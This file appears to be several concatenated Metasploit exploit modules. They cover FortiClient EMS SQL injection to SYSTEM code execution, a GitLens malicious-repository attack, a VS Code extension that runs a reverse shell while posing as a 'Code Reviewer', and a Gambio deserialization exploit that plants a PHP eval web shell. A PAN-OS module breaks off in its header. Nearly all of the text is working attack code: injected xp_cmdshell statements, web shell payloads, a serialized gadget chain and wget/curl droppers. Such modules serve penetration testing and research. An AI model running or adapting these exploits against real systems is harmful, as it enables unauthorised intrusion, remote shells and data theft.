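##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  # Largest n accepted by a T-SQL VARCHAR(n) declaration. The final injected
  # statement declares the decoded command as VARCHAR(<payload length>), so a
  # longer payload cannot be staged through it and is rejected up front.
  MAX_VARCHAR_LENGTH = 8000

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE',
        'Description' => %q{
          An SQL injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).
          FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized
          platform for overseeing enrolled endpoints. The SQLi vulnerability is due to user-controlled strings which
          can be sent directly into database queries.

          FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013
          and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.
          In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable to
          SQLi. The SQLi can be used to enable xp_cmdshell which can then be used to obtain unauthenticated remote code
          execution in the context of NT AUTHORITY\SYSTEM

          Affected versions of FortiClient EMS include:
          7.2.0 through 7.2.2
          7.0.1 through 7.0.10

          Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.

          It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient
          EMS for the necessary vulnerable services to be available.
        },
        'Author' => [
          'Zach Hanley', # Analysis & PoC
          'James Horseman', # Analysis & PoC
          'jheysel-r7', # Msf module
          'Spencer McIntyre' # Msf module assistance
        ],
        'References' => [
          [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],
          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],
          [ 'CVE', '2023-48788']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Privileged' => true,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-04-21',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 8013
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
  end

  # Build the base64-encoded SYSINFO blob that accompanies a client registration.
  # Most fields are static values copied from a real enrolment; the install UID,
  # interface addresses and SID are randomised so repeated runs do not collide.
  def get_register_info
    register_info = <<~REGISTER_INFO
      AVSIG_VER=1.00000
      REG_KEY=_
      EP_ONNETCHKSUM=0
      AVENG_VER=6.00266
      DHCP_SERVER=None
      FCTOS=WIN64
      VULSIG_VER=1.00000
      FCTVER=7.0.7.0345
      APPSIG_VER=13.00364
      USER=Administrator
      APPENG_VER=4.00082
      AVALSIG_VER=0.00000
      VULENG_VER=2.00032
      OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)
      COM_MODEL=VMware Virtual Platform
      RSENG_VER=1.00020
      AV_PROTECTED=0
      AVALENG_VER=0.00000
      PEER_IP=
      ENABLED_FEATURE_BITMAP=49
      EP_OFFNETCHKSUM=0
      INSTALLED_FEATURE_BITMAP=158583
      EP_CHKSUM=0
      HIDDEN_FEATURE_BITMAP=155943
      DISKENC=
      HOSTNAME=CYBER-RETQB1FLP
      AV_PRODUCT=
      FCT_SN=FCT8001638848651
      INSTALLUID=#{Faker::Internet.uuid.upcase}
      NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
      UTC=1710271774
      PC_DOMAIN=
      COM_MAN=VMware, Inc.
      CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz
      MEM=12287
      HDD=99
      COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82
      DOMAIN=
      WORKGROUP=WORKGROUP
      USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
      GROUP_TAG=
      ADGUID=
      EP_FGTCHKSUM=0
      EP_RULECHKSUM=0
      WF_FILESCHKSUM=0
      EP_APPCTRLCHKSUM=0
    REGISTER_INFO
    Rex::Text.encode_base64(register_info)
  end

  # Build the FcmDaemon registration message with the SQLi string appended to
  # the FCTUID header field.
  #
  # The SIZE field must contain the length of the finished message, but the
  # message length itself depends on how many digits SIZE has, so the value is
  # resolved as a fixed point instead of a single subtraction (which is off by
  # one whenever the length crosses a power of ten).
  #
  # @param sqli [String] the SQL fragment to splice into the FCTUID field
  # @return [String] the complete message, ready to be written to the socket
  def get_message(sqli)
    message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{SQLI_PLACEHOLDER}\n"
    message << "IP=127.0.0.1\n"
    message << "MAC=#{Faker::Internet.mac_address}\n"
    message << "FCT_ONNET=0\n"
    message << "CAPS=32767\n"
    message << "VDOM=default\n"
    message << "EC_QUARANTINED=0\n"
    message << "SIZE= {SIZE_PLACEHOLDER}\n"
    message << "\n"
    message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"
    message << 'X-FCCK-REGISTER-END'
    message << "\r\n"
    message << "\r\n"
    # Block form so backslash sequences in the SQL are inserted literally rather
    # than being interpreted as gsub back-references.
    message.gsub!('{SQLI_PLACEHOLDER}') { sqli }

    base_length = message.bytesize - '{SIZE_PLACEHOLDER}'.bytesize
    size = base_length
    loop do
      candidate = base_length + size.to_s.length
      break if candidate == size

      size = candidate
    end
    message.gsub!('{SIZE_PLACEHOLDER}') { size.to_s }
    message
  end

  # Send one message to FcmDaemon over TLS and return whatever it replied.
  #
  # @param sqli [String] the SQL fragment passed through to #get_message
  # @return [String, nil] the raw response; an empty string when the service
  #   closed the connection without replying (expected once xp_cmdshell runs
  #   the payload); nil when the connection itself could not be established,
  #   so callers can tell "unreachable" apart from "no reply"
  def send_message(sqli)
    message = get_message(sqli)
    vprint_status("Sending the following message: #{message}")

    buf = nil
    begin
      connect(true, { 'SSL' => true })
      sock.put(message)
      buf = sock.get_once || ''
    rescue ::EOFError
      # The peer hung up without data; treat as an empty reply, not a failure.
      buf = ''
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      vprint_error("Connection to #{peer} failed: #{e.class}")
      buf = nil
    ensure
      disconnect
    end
    vprint_status("The response received was: #{buf}") unless buf.nil?
    buf
  end

  # A tautology in the FCTUID field makes a vulnerable server answer with the
  # keep-alive settings (KA_INTERVAL) for the first matching record; a patched
  # server reports that the record does not exist.
  def check
    res = send_message("' OR 1=1; --")
    return CheckCode::Unknown("#{peer} - could not connect to FcmDaemon.exe") if res.nil?
    return CheckCode::Vulnerable('The SQLi has been exploited successfully') if res.include?('KA_INTERVAL')
    return CheckCode::Safe if res.include?("The FCT record doesn't exist")

    CheckCode::Unknown("#{peer} - FcmDaemon.exe does not appear to be running on the endpoint targeted")
  end

  def exploit
    # Things to note:
    # 1. xp_cmdshell is disabled by default so first we must enable it.
    # 2. The application takes the SQL statement we inject into and converts it all to upper case. This was causing
    #    attempted Base64 encoded payloads to fail, and is why we send the payload as a hex string and decode it using SQL
    #    before running the command with xp_cmdshell.
    # 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which
    #    is when we expect the response to be empty.
    cmd = payload.encoded
    if cmd.bytesize > MAX_VARCHAR_LENGTH
      fail_with(Failure::BadConfig, "The payload is #{cmd.bytesize} bytes but VARCHAR(n) only allows up to #{MAX_VARCHAR_LENGTH}; choose a smaller payload")
    end

    enable_xp_cmdshell = [
      "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",
      "' OR 1=1; reconfigure;--",
      "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",
      "' OR 1=1; reconfigure;--"
    ]
    run_payload = "' OR 1=1; DECLARE @SQL VARCHAR(#{cmd.bytesize}) = CONVERT(VARCHAR(MAX), 0X#{cmd.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--"

    enable_xp_cmdshell.each do |sqli|
      res = send_message(sqli)
      fail_with(Failure::Unreachable, "Could not connect to #{peer} while sending: #{sqli}") if res.nil?
      fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.') unless res.include?('KA_INTERVAL')
      print_good("The SQLi: #{sqli} was executed successfully")
    end

    # A successful xp_cmdshell invocation is the one case where the service
    # returns nothing at all; anything else means the statement did not run.
    res = send_message(run_payload)
    fail_with(Failure::Unreachable, "Could not connect to #{peer} while delivering the payload") if res.nil?
    fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.') unless res.empty?
    print_good("The SQLi: #{run_payload} was executed successfully")
  end
end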
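##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GitLens Git Local Configuration Exec',
        'Description' => %q{
          GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git
          commands. A repo may include its own .git folder including a malicious config file to
          execute arbitrary code.

          Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # Metasploit module
          'Paul Gerste', # Original advisory and PoC
        ],
        'References' => [
          ['URL', 'https://www.sonarsource.com/blog/vscode-security-markdown-vulnerabilities-in-extensions/'],
          ['URL', 'https://www.sonarsource.com/blog/securing-developer-tools-git-integrations/'], # git hook
          ['URL', 'https://github.com/gitkraken/vscode-gitlens/commit/ee2a0c42a92d33059a39fd15fbbd5dd3d5ab6440'], # patch
          ['CVE', '2023-46944']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => false,
          'FILENAME' => 'repo.zip',
          'WfsDelay' => 3_600 # 1hr
        },
        'Arch' => ARCH_CMD,
        'Targets' => [
          [
            'Linux/Unix (In-Memory)',
            {
              'Platform' => [ 'unix', 'linux' ],
              'Type' => :unix_cmd
            },
          ],
          # There may be a size limit, but using fetch payloads works great
          [
            'PowerShell (In-Memory)',
            {
              'Platform' => 'win',
              'Payload' => {
                'BadChars' => '"&'
              }
            }
          ],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # windows fetch payloads pops up a CMD window for a second, then goes away
        },
        'Privileged' => false,
        'DisclosureDate' => '2023-11-14'
      )
    )

    register_options([
      OptString.new('README', [true, 'The contents of the readme markdown file', '# Test'])
    ])
  end

  # Contents of README.md placed in the generated repository; purely cosmetic.
  def readme
    datastore['README'].to_s
  end

  # Contents of .git/HEAD; points at a branch that does not need to exist for
  # the config file to be read.
  def git_head
    'ref: refs/heads/master'
  end

  # Escape a value for use inside a double-quoted git config string.
  #
  # Git only recognises \" and \\ (plus \n, \t and \b) inside quotes and
  # refuses to parse the whole config file on any other backslash sequence, so
  # an unescaped quote or backslash in the payload would silently break the
  # exploit. Both characters are escaped here; git unescapes them when it
  # reads the value back.
  #
  # @param value [String] raw value
  # @return [String] value safe to embed between double quotes
  def escape_git_config_value(value)
    value.gsub(/["\\]/, '"' => '\\"', '\\' => '\\\\')
  end

  # Contents of .git/config. The payload is delivered through core.fsmonitor,
  # which GitLens causes git to execute when the workspace is opened.
  def git_config
    %([core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	fsmonitor = "#{escape_git_config_value(payload.encoded)} #") # without the trailing # windows tacks on <space><int, 0><space><a long number>. so this avoids corrupting the payload
  end

  def exploit
    # Create malicious zip archive containing our git repo
    files =
      [
        { data: readme, fname: 'README.md' },
        { data: git_config, fname: '.git/config' },
        { data: git_head, fname: '.git/HEAD' },
        { data: '', fname: '.git/objects/info/' },
        { data: '', fname: '.git/objects/pack/' },
        { data: '', fname: '.git/refs/heads/' },
        { data: '', fname: '.git/refs/tags/' },
      ]

    zip = Msf::Util::EXE.to_zip(files)

    file_create(zip)
    print_status('Waiting for shell')
  end
end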
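##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Visual Studio vsix Extension Exec',
        'Description' => %q{
          Creates a vsix file which can be installed in Visual Studio Code as an extension.
          At activation/install, the extension will execute a shell or two.

          Tested against VSCode 1.87.2 on Ubuntu 22.04
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # Metasploit module
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => false,
          'FILENAME' => 'extension.vsix',
          'WfsDelay' => 3_600, # 1hr
          'payload' => 'nodejs/shell_reverse_tcp' # cross platform
        },
        'Platform' => 'nodejs',
        'Arch' => ARCH_NODEJS,
        'Targets' => [
          ['Automatic', {}],
        ],
        'References' => [
          ['URL', 'https://medium.com/@VakninHai/the-hidden-risks-of-visual-studio-extensions-a-new-avenue-for-persistence-attacks-e56722c048f1'], # similar idea
          ['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],
          ['URL', 'https://code.visualstudio.com/api/references/activation-events'] # onStartup Action
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        },
        'Privileged' => false,
        'DisclosureDate' => '2024-03-22' # date of development
      )
    )

    register_options([
      OptString.new('NAME', [true, 'The name of the extension', 'Code Reviewer']),
      OptString.new('DESCRIPTION', [true, 'The description of the extension', 'Reviews code']),
      OptString.new('VERSION', [true, 'The version of the extension', '0.0.1']),
      OptString.new('README', [false, 'The readme contents for the extension', '']),
    ])
  end

  # Display name of the extension (user supplied, embedded in XML and JSON).
  def name
    datastore['NAME']
  end

  # Description of the extension (user supplied, embedded in XML and JSON).
  def description
    datastore['DESCRIPTION']
  end

  # Version string of the extension (user supplied, embedded in XML and JSON).
  def version
    datastore['VERSION']
  end

  # Readme contents; optional, so coerce nil to an empty string before it is
  # handed to the zip writer.
  def readme
    datastore['README'].to_s
  end

  # Escape a user supplied value so it can be embedded in XML text or an XML
  # attribute without breaking the manifest.
  #
  # @param value [String] raw value
  # @return [String] value with &, <, > and " replaced by entity references
  def escape_xml_text(value)
    value.to_s.gsub(/[&<>"]/, '&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;')
  end

  # Escape a user supplied value so it can be embedded inside a JSON string
  # literal. Covers the quote, backslash and the common whitespace controls;
  # other control characters are left as-is.
  #
  # @param value [String] raw value
  # @return [String] value safe to place between double quotes in JSON
  def escape_json_string(value)
    value.to_s.gsub(/["\\\n\r\t]/, '"' => '\\"', '\\' => '\\\\', "\n" => '\\n', "\r" => '\\r', "\t" => '\\t')
  end

  # The top-level extension.vsixmanifest. User controlled fields are escaped
  # so a quote or angle bracket in NAME/DESCRIPTION cannot corrupt the XML.
  def manifest
    %(<?xml version="1.0" encoding="utf-8"?>
<PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011">
  <Metadata>
    <Identity Language="en-US" Id="extension-name-fillmein" Version="#{escape_xml_text(version)}" Publisher="#{Rex::Text.rand_text_alpha(10)}" />
    <DisplayName>#{escape_xml_text(name)}</DisplayName>
    <Description xml:space="preserve">#{escape_xml_text(description)}</Description>
    <Tags></Tags>
    <GalleryFlags>Public</GalleryFlags>

    <Properties>
      <Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.60.0" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionDependencies" Value="" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionPack" Value="" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionKind" Value="workspace" />
      <Property Id="Microsoft.VisualStudio.Code.LocalizedLanguages" Value="" />
      <Property Id="Microsoft.VisualStudio.Services.GitHubFlavoredMarkdown" Value="true" />
      <Property Id="Microsoft.VisualStudio.Services.Content.Pricing" Value="Free"/>
    </Properties>
  </Metadata>
  <Installation>
    <InstallationTarget Id="Microsoft.VisualStudio.Code"/>
  </Installation>
  <Dependencies/>
  <Assets>
    <Asset Type="Microsoft.VisualStudio.Code.Manifest" Path="extension/package.json" Addressable="true" />
  </Assets>
</PackageManifest>)
  end

  # The extension entry point. The payload runs inside activate(), which VS Code
  # calls for the onStartupFinished activation event declared in package.json.
  def extension_js
    %|const vscode = require('vscode');

function activate(context) {
  #{payload.encoded}
}

function deactivate() {}

module.exports = {
  activate,
  deactivate
}
|
  end

  # The extension's package.json. User controlled fields are escaped so a
  # quote or backslash in NAME/DESCRIPTION cannot produce invalid JSON.
  def package_json
    %({
  "name": "#{escape_json_string(name.gsub(' ', '.'))}",
  "displayName": "#{escape_json_string(name)}",
  "description": "#{escape_json_string(description)}",
  "version": "#{escape_json_string(version)}",
  "publisher":"#{Rex::Text.rand_name}",
  "engines": {
    "vscode": "^1.60.0"
  },
  "activationEvents": ["onStartupFinished"],
  "main": "./extension.js",
  "devDependencies": {
    "@types/vscode": "^1.60.0"
  }
}
)
  end

  def exploit
    # Create malicious vsix (zip archive) containing our exploit
    files =
      [
        { data: manifest, fname: 'extension.vsixmanifest' },
        { data: extension_js, fname: 'extension/extension.js' },
        { data: package_json, fname: 'extension/package.json' },
        { data: readme, fname: 'extension/README.md' }, # not required, but looks a little more official
      ]

    zip = Msf::Util::EXE.to_zip(files)

    file_create(zip)
    print_status('Waiting for shell')
  end
end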
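##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability',
        'Description' => %q{
          A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower
          allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.
          The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
          which ultimately allows an attacker to execute remote code on affected systems.
          The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
          potentially resulting in complete system compromise, data exfiltration, or unauthorized access
          to sensitive information.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'usd Herolab' # Discovery of the vulnerability
        ],
        'References' => [
          ['CVE', '2024-23759'],
          ['URL', 'https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759'],
          ['URL', 'https://herolab.usd.de/en/security-advisories/usd-2023-0046/']
        ],
        'DisclosureDate' => '2024-01-19',
        'Platform' => ['php', 'unix', 'linux'],
        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
        'Privileged' => false,
        'Targets' => [
          [
            'PHP',
            {
              'Platform' => ['php'],
              'Arch' => ARCH_PHP,
              'Type' => :php
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => ['linux'],
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
              'Linemax' => 16384
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'The Gambio Webshop endpoint URL', '/' ]),
      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),
      OptEnum.new('COMMAND',
                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
    ])
  end

  # Run PHP code through the uploaded eval() web shell.
  #
  # @param cmd [String] PHP source, sent base64 encoded in the POST parameter
  #   chosen in #upload_webshell
  # @return [Rex::Proto::Http::Response, nil] the HTTP response
  def execute_php(cmd, _opts = {})
    encoded_cmd = Base64.strict_encode64(cmd)
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, @webshell_name),
      'vars_post' => {
        @post_param => encoded_cmd
      }
    })
  end

  # Run an OS command through the uploaded web shell. The PHP function used to
  # execute it (COMMAND option) is passed in the GET parameter, the base64
  # encoded command in the POST parameter; both names are chosen in
  # #upload_webshell.
  #
  # @param cmd [String] shell command
  # @return [Rex::Proto::Http::Response, nil] the HTTP response
  def execute_command(cmd, _opts = {})
    encoded_cmd = Base64.strict_encode64(cmd)
    php_cmd_function = datastore['COMMAND']
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, @webshell_name),
      'vars_get' => {
        @get_param => php_cmd_function
      },
      'vars_post' => {
        @post_param => encoded_cmd
      }
    })
  end

  # Plant the web shell by triggering the deserialization flaw.
  #
  # A serialized GuzzleHttp\Cookie\FileCookieJar is submitted via the
  # Parcelshopfinder 'search' parameter; when it is destructed, Guzzle writes
  # its cookie jar (whose cookie value is our PHP) to the file name we chose,
  # which lands inside the web root. A guest session is created first because
  # the vulnerable endpoint requires one, and the guest form only accepts a
  # country that is configured as a tax country, so every offered country code
  # is tried until one is accepted.
  #
  # Sets @webshell_name, @post_param and @get_param for the execute_* helpers.
  #
  # @return [Rex::Proto::Http::Response, nil] the last HTTP response received;
  #   the caller expects a 500 from the deserialization request on success
  def upload_webshell
    # randomize file name if option WEBSHELL is not set
    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")

    # randomize e-mail address, firstname and lastname to be used in payload and POST requests
    # NOTE(review): this assumes rand_mail_address yields "first.last@domain"; lastname is nil otherwise
    email = Rex::Text.rand_mail_address
    email_array = email.split('@')
    domain = email_array[1]
    firstname = email_array[0].split('.')[0]
    lastname = email_array[0].split('.')[1]
    hostname = Rex::Text.rand_hostname

    # Upload webshell with PHP payload
    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
    @get_param = Rex::Text.rand_text_alphanumeric(1..8)

    if target['Type'] == :php
      php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
    else
      php_payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
    end

    # PHP serialize() string lengths are byte counts, so use bytesize rather
    # than the character length (identical for ASCII, which is the usual case).
    php_payload_len = php_payload.bytesize
    webshell_name_len = @webshell_name.bytesize
    domain_len = domain.bytesize
    hostname_len = hostname.bytesize
    final_payload = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";a:9:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:#{php_payload_len}:\"#{php_payload}\";s:4:\"Path\";s:1:\"/\";s:4:\"Name\";s:#{hostname_len}:\"#{hostname}\";s:6:\"Domain\";s:#{domain_len}:\"#{domain}\";s:6:\"Secure\";b:0;s:8:\"Httponly\";b:0;s:7:\"Max-Age\";i:3;}}}s:39:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00strictMode\";N;s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";s:#{webshell_name_len}:\"#{@webshell_name}\";s:52:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00storeSessionCookies\";b:1;}"
    final_payload_b64 = Base64.strict_encode64(final_payload)

    # create guest user to get a valid session cookie
    # country variable should match with a configured tax country in the gambio admin panel
    # grab the available tax country code settings from the CreateGuest form page
    res = send_request_cgi!({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest')
    })
    if res && res.code == 200
      html = res.get_html_document
      unless html.blank?
        country_tax_options = html.css('select[@id="country"]')
        country_tax_options.css('option').each do |country|
          vprint_status("Application's tax country code setting required for exploitation: #{country['value']}")
          res = send_request_cgi({
            'method' => 'POST',
            'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),
            'keep_cookies' => true,
            'vars_post' => {
              'firstname' => firstname,
              'lastname' => lastname,
              'email_address' => email,
              'email_address_confirm' => email,
              'b2b_status' => 0,
              'company' => nil,
              'vat' => nil,
              'street_address' => Rex::Text.rand_text_alpha_lower(8..12),
              'postcode' => Rex::Text.rand_text_numeric(5),
              'city' => Rex::Text.rand_text_alpha_lower(4..12),
              'country' => country['value'],
              'telephone' => Rex::Text.rand_text_numeric(10),
              'fax' => nil,
              'action' => 'process'
            }
          })
          # A 302 means the guest account was accepted; any other status means
          # this country is not a configured tax country, so try the next one.
          next unless res && res.code == 302

          res = send_request_cgi({
            'method' => 'POST',
            'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'),
            'keep_cookies' => true,
            'vars_post' => {
              'checkout_started' => 0,
              'search' => final_payload_b64,
              'street_address' => Rex::Text.rand_text_alpha_lower(4..12),
              'house_number' => Rex::Text.rand_text_numeric(1..2),
              'additional_info' => nil,
              'postcode' => Rex::Text.rand_text_numeric(5),
              'city' => Rex::Text.rand_text_alpha_lower(8..12),
              'country' => 'DE',
              'firstname' => firstname,
              'lastname' => lastname,
              'postnumber' => Rex::Text.rand_text_numeric(6),
              'psf_name' => Rex::Text.rand_text_alpha_lower(1..3)
            }
          })
          break
        end
      end
    end
    res
  end

  # Only confirms that the target looks like a Gambio shop; the version is not
  # fingerprinted, so the best this can return is Detected.
  def check
    print_status("Checking if #{peer} can be exploited.")
    res = send_request_cgi!({
      'method' => 'GET',
      'ctype' => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path)
    })
    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200

    # Check if target is running a Gambio webshop
    # Search for "Gambio" (any capitalisation) on the login page
    return CheckCode::Safe unless res.body.downcase.include?('gambio')

    CheckCode::Detected('It looks like Gambio Webshop is running.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    res = upload_webshell
    # The deserialization request errors out (500) once the cookie jar has been
    # written, so 500 is the success signal here.
    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 500
    register_file_for_cleanup(@webshell_name)

    case target['Type']
    when :php
      execute_php(payload.encoded)
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # Don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_cmdstager({ linemax: target.opts['Linemax'] })
    end
  end
end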
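##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Linux NAME_MAX: the longest single path component the target filesystem
  # will accept. The whole shell command has to fit in one file name.
  MAX_FILE_NAME_LENGTH = 255

  # Upper bound on re-encoding attempts when searching for a base64 form of the
  # payload that contains no '/' (see #build_command).
  MAX_ENCODE_ATTEMPTS = 2000

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
          allow an unauthenticated attacker to create arbitrarily named files and execute
          shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
          GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
          include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
          one hour to execute, depending on how often the telemetry service is set to run.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'remmons-r7', # Metasploit module
          'sfewer-r7' # Metasploit module
        ],
        'References' => [
          ['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier
          ['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory
          ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation
          ['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis
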